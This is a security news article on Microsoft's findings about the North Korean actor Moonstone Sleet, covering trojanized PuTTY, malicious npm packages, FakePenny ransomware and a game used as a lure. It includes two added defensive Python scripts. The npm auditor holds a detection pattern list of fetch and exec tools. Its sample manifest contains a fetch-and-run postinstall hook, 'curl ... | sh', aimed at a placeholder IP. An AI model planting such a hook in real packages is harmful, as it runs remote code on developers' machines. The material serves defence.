Friday, May 9, 2025

North Korean Moonstone Sleet Uses Creative Tactics to Deploy Custom Ransomware


Microsoft has identified a new North Korean threat actor, tracked as Moonstone Sleet, that mixes well-established tradecraft with novel lures to pursue both financial gain and cyberespionage.

Moonstone Sleet, formerly tracked as Storm-1789, has set up fake companies, distributed trojanized software, and even built a malicious video game to get a foothold in target organizations.

Exploiting New Vectors

Moonstone Sleet has been observed using trojanized versions of legitimate tools like PuTTY to gain initial access to organizations.


In this scheme the actor sends a modified PuTTY executable to the target over platforms such as LinkedIn, Telegram and developer freelancing sites, together with connection details. When the victim runs the binary and enters the supplied IP address and password, the trojanized client decrypts an embedded payload and loads further malicious stages.
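A trojanized PuTTY only works if the victim trusts an executable handed to them over a chat channel. The following added example (not Microsoft's or this article's code) shows the two offline checks a developer or help desk can run before executing such a file: compare its SHA-256 with a golden copy obtained directly from the vendor, and confirm that the PE even carries an Authenticode signature directory. The "golden" and "trojanized" binaries below are constructed minimal PE32+ images, not real PuTTY builds, so the hash allowlist is built at runtime from the constructed golden copy; in practice you would populate it from hashes of vendor downloads. A present signature directory is only a precondition: the chain still has to be validated with `Get-AuthenticodeSignature` or `signtool verify`, which this script does not attempt.

```python
"""Offline sanity checks for a Windows binary received out of band."""
import hashlib
import struct

PE_SIGNATURE = b"PE\0\0"
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
IMAGE_DIRECTORY_ENTRY_SECURITY = 4  # index of the Authenticode data directory


def authenticode_directory(data: bytes):
    """Return (rva, size) of the security data directory, or None if `data`
    is not a parseable PE. A size of 0 means no signature is attached."""
    if len(data) < 64 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        return None
    coff = e_lfanew + 4                 # IMAGE_FILE_HEADER (20 bytes)
    opt = coff + 20                     # IMAGE_OPTIONAL_HEADER
    (size_of_opt,) = struct.unpack_from("<H", data, coff + 16)
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == PE32_MAGIC:
        dirs = opt + 96                 # data directories start here for PE32
    elif magic == PE32PLUS_MAGIC:
        dirs = opt + 112                # ... and here for PE32+
    else:
        return None
    entry = dirs + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    if entry + 8 > opt + size_of_opt or entry + 8 > len(data):
        return None
    return struct.unpack_from("<II", data, entry)


def audit(data: bytes, known_good: set) -> dict:
    """Hash the file and inspect its signature directory."""
    digest = hashlib.sha256(data).hexdigest()
    sec = authenticode_directory(data)
    return {
        "sha256": digest,
        "known_good": digest in known_good,
        "is_pe": sec is not None,
        "has_signature_dir": bool(sec and sec[1] > 0),
    }


def verdict(report: dict) -> str:
    if report["known_good"]:
        return "matches golden copy"
    if not report["is_pe"]:
        return "not a PE file"
    if not report["has_signature_dir"]:
        return "REJECT: unknown hash and no Authenticode signature"
    return "QUARANTINE: unknown hash; verify signature chain before use"


def build_sample_pe(signature_size: int) -> bytes:
    """Constructed minimal PE32+ image for demonstration (not a real PuTTY)."""
    img = bytearray(64 + 4 + 20 + 240)            # DOS stub + PE sig + COFF + optional
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 64)           # e_lfanew
    img[64:68] = PE_SIGNATURE
    struct.pack_into("<HH", img, 68, 0x8664, 0)     # Machine=AMD64, NumberOfSections=0
    struct.pack_into("<H", img, 68 + 16, 240)       # SizeOfOptionalHeader
    opt = 88
    struct.pack_into("<H", img, opt, PE32PLUS_MAGIC)
    struct.pack_into("<I", img, opt + 108, 16)      # NumberOfRvaAndSizes
    struct.pack_into("<II", img, opt + 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                     0x2000 if signature_size else 0, signature_size)
    return bytes(img)


# Constructed samples: a "vendor" copy, the same file with one patched byte,
# and a rebuilt copy with the signature stripped.
GOLDEN = build_sample_pe(signature_size=0x1800)
_patched = bytearray(GOLDEN)
_patched[200] ^= 0xFF
TROJANIZED = bytes(_patched)
UNSIGNED = build_sample_pe(signature_size=0)
KNOWN_GOOD = {hashlib.sha256(GOLDEN).hexdigest()}  # assumed golden hash set

if __name__ == "__main__":
    for label, blob in (("golden", GOLDEN), ("patched", TROJANIZED), ("unsigned", UNSIGNED)):
        print(f"{label:9s} {verdict(audit(blob, KNOWN_GOOD))}")
```

Because a single patched byte changes the digest, the hash comparison catches a backdoored build regardless of how it hides its payload; the signature-directory check catches the lazier case where the actor simply ships an unsigned rebuild.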

Figure: Moonstone Sleet attack chain using trojanized PuTTY

The actor has also used malicious npm packages to target software developers, typically presenting them as part of a skills assessment or a proposed project collaboration.

According to Microsoft's report, these tactics show the actor's ability to adapt and evolve its tradecraft, and they mirror techniques used by other North Korean threat actors such as Diamond Sleet.
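A "skills assessment" repository does nothing until the developer runs `npm install`, at which point any lifecycle hook (preinstall, install, postinstall, prepare) executes with the developer's privileges before a single test runs. The following added example (not Microsoft's or this article's tooling, and not a claim about how Moonstone Sleet's packages were built) audits a project and its node_modules tree for such hooks and grades the ones that fetch or execute external code. The two manifests are constructed samples; the IP address is from the documentation range.

```python
"""Flag npm packages that run code at install time."""
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")
# Rarely legitimate inside the install hook of a take-home exercise.
FETCH_OR_EXEC = re.compile(
    r"curl|wget|Invoke-WebRequest|powershell|node\s+-e|eval\(|base64|child_process|/tmp/",
    re.IGNORECASE,
)


def audit_manifest(manifest: dict) -> list:
    """Return (severity, package, hook, command) for every lifecycle hook found."""
    findings = []
    scripts = manifest.get("scripts") or {}
    name = manifest.get("name", "?")
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        severity = "high" if FETCH_OR_EXEC.search(cmd) else "medium"
        findings.append((severity, name, hook, cmd))
    return findings


def audit_tree(root: str) -> list:
    """Audit every package.json under root: the project and all of node_modules."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        path = os.path.join(dirpath, "package.json")
        with open(path, encoding="utf-8") as fh:
            try:
                manifest = json.load(fh)
            except json.JSONDecodeError:
                findings.append(("medium", path, "package.json", "unparseable manifest"))
                continue
        findings.extend(audit_manifest(manifest))
    return findings


# Constructed sample manifests (hypothetical package names, not real packages).
BENIGN = {
    "name": "assessment-app", "version": "1.0.0",
    "scripts": {"test": "jest"},
    "dependencies": {"left-pad-clone": "1.0.0"},
}
SUSPECT = {
    "name": "left-pad-clone", "version": "1.0.0",
    "scripts": {"postinstall":
                "node -e \"require('child_process').exec('curl -s http://203.0.113.5/x | sh')\""},
}


def write_sample_project() -> str:
    """Lay out BENIGN as the project and SUSPECT as one of its dependencies."""
    root = tempfile.mkdtemp(prefix="npm-audit-")
    dep = os.path.join(root, "node_modules", "left-pad-clone")
    os.makedirs(dep)
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        json.dump(BENIGN, fh)
    with open(os.path.join(dep, "package.json"), "w", encoding="utf-8") as fh:
        json.dump(SUSPECT, fh)
    return root


if __name__ == "__main__":
    for severity, pkg, hook, cmd in audit_tree(write_sample_project()):
        print(f"[{severity}] {pkg} {hook}: {cmd}")
```

Run it against the unpacked repository before installing, and install unknown "assessment" projects with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) inside a throwaway VM or container so that a hook which slips past the pattern list still cannot reach developer credentials.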

Custom Ransomware and Malicious Games

One of the most notable tactics employed by Moonstone Sleet is the deployment of a custom ransomware variant named FakePenny.

The ransomware was deployed in April 2024 against an organization the actor had already compromised in February, so the encryption stage followed roughly two months of prior access.

The ransom demand was substantial, $6.6 million in Bitcoin, indicating a significant financial objective.

Additionally, Moonstone Sleet has developed a fully functional malicious game called DeTankWar; players are required to register, and the game installer is used to deliver malware.

Figure: Page from the DeTankWar website

The game is promoted through fake companies and social media personas, adding a layer of legitimacy to the actor’s campaigns.

Moonstone Sleet's operations stand out for their breadth: several lures and campaigns run in parallel, each with its own front company or persona.

The actor has created fake companies, such as StarGlow Ventures and C.C. Waterfall, to engage with potential targets in the education and software development sectors.

These companies are used to build relationships with organizations, potentially for future malicious access or revenue generation.

Moonstone Sleet’s ability to conduct concurrent operations across multiple campaigns suggests it is well-resourced and capable of expanding its capabilities, including the use of ransomware for disruptive operations.


Aman Mishra is a security and privacy reporter covering data breaches, cybercrime, malware, and vulnerabilities.
